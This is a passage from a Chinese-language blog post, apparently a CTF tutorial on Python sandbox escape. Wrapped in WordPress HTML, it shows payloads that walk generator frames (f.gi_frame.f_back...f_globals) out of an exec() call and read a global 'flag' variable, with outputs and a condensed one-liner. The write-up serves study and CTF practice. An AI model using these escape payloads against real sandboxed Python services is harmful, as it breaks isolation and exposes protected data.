f.gi_frame.f_back.f_back.f_globals&#91;'flag'&#93;\nf = f()\nframe = 
next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">test<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">py<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u6765\u770b\u6bcf\u4e00\u6b65\u5206\u522b\u5b9e\u73b0\u4e86\u4ec0\u4e48\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 
16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# &lt;frame at 0x7031974fa8c0, file 'test1', line 3, code f><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x7031974fa8c0, file &#39;test1&#39;, line 3, code f&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 
24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# &lt;frame at 0x7ff7d792a750, file 'test1', line 6, code &lt;module>><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: 
#999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x7ff7d792a750, file &#39;test1&#39;, line 6, code &lt;module&gt;&gt;<\/span><\/span><\/code><\/pre><span 
style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back.f_back\nf = f()\nframe = next(f)\nprint(frame)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n#  &lt;frame at 0x70be5c12f100, file '\/CTF\/Python\/0Test\/test.py', line 11, code &lt;module>><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki 
vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame.f_back.f_back<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: 
#998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\">#  &lt;frame at 0x70be5c12f100, file &#39;\/CTF\/Python\/0Test\/test.py&#39;, line 11, code &lt;module&gt;&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\u5c31\u5df2\u7ecf\u5b9e\u73b0\u6c99\u7bb1\u7684\u9003\u9038\u4e86\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u8fd9\u79cd\u5199\u6cd5\u65e0\u6cd5\u5b9e\u73b0\u9003\u9038\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield f.gi_frame\nf = f()\nframe = next(f)\nprint(frame.f_back)\n'''\nlocals={}\ncode=compile(payload,\"test1\",\"exec\")\nexec(code,locals)\n\u200b\n# None<\/textarea><\/pre><svg 
xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">flag<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flagflag<\/span><span style=\"color: #B5695999\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield f.gi_frame<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">frame = next(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(frame.f_back)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">={}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #998418\">compile<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span 
style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">test1<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">exec<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">exec<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">code<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #998418\">locals<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># None<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u751f\u6210\u5668\u4e2d\u5fc5\u987b\u8981 yield \u5230 <strong>f.gi_frame.f_back<\/strong>\uff0c\u5982\u679c\u53ea\u662f yield \u5230 <strong>f.gi_frame<\/strong>\uff0c\u7b2c\u4e00\u6b21 next() \u8fd4\u56de\u540e\u751f\u6210\u5668\u6302\u8d77\uff0c\u8be5\u6808\u5e27\u5c31\u8131\u79bb\u4e86\u8c03\u7528\u6808\uff0c\u4e4b\u540e\u518d\u64cd\u4f5c\u8be5\u6808\u5e27\u5bf9\u8c61\u65f6 <strong>f_back<\/strong> \u5c31\u662f None\uff08\u5373\u4e0a\u4f8b\u7684\u8f93\u51fa\uff09\uff0c\u4e0d\u518d\u6307\u5411 exec() \u521b\u5efa\u7684\u6808\u5e27\u4e86\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u7528 <strong>for<\/strong> \u5173\u952e\u5b57\u5b9e\u73b0 next() \u51fd\u6570\u7684\u5e73\u66ff\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 
24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload='''\ndef f():\n \u00a0  yield f.gi_frame.f_back.f_back.f_back.f_globals&#91;'flag'&#93;\nf = f()\nf = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21\nprint(f)\n'''<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">def f():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\"> \u00a0  yield 
f.gi_frame.f_back.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = f()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u7cbe\u7b80\u5199\u6cd5\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload='''f = (f.gi_frame.f_back.f_back.f_back.f_globals&#91;'flag'&#93; for i in &#91;1&#93;)\nf = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e 
next() \u4e00\u6b21\nprint(f)\n'''<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><span style=\"color: #B56959\">f = (f.gi_frame.f_back.f_back.f_back.f_globals&#91;&#39;flag&#39;&#93; for i in &#91;1&#93;)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">f = &#91;x for x in f&#93;&#91;0&#93; \u00a0  # \u83b7\u53d6\u751f\u6210\u5668\u7684\u7b2c\u4e00\u4e2a\u503c\uff0c\u76f8\u5f53\u4e8e next() \u4e00\u6b21<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">print(f)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B5695999\">&#39;&#39;&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"python\u4e0b\u7684Rce\u73af\u5883 object\u7c7b \u5728 python \u4e2d\uff0c\u6240\u6709\u7c7b\u7684\u9876\u5c42\u7236\u7c7b\u662f object \u7c7b\uff0c\u6240\u6709\u7c7b\u90fd\u76f4\u63a5\u6216\u95f4\u63a5\u7684\u7ee7\u627f\u4e8e object 
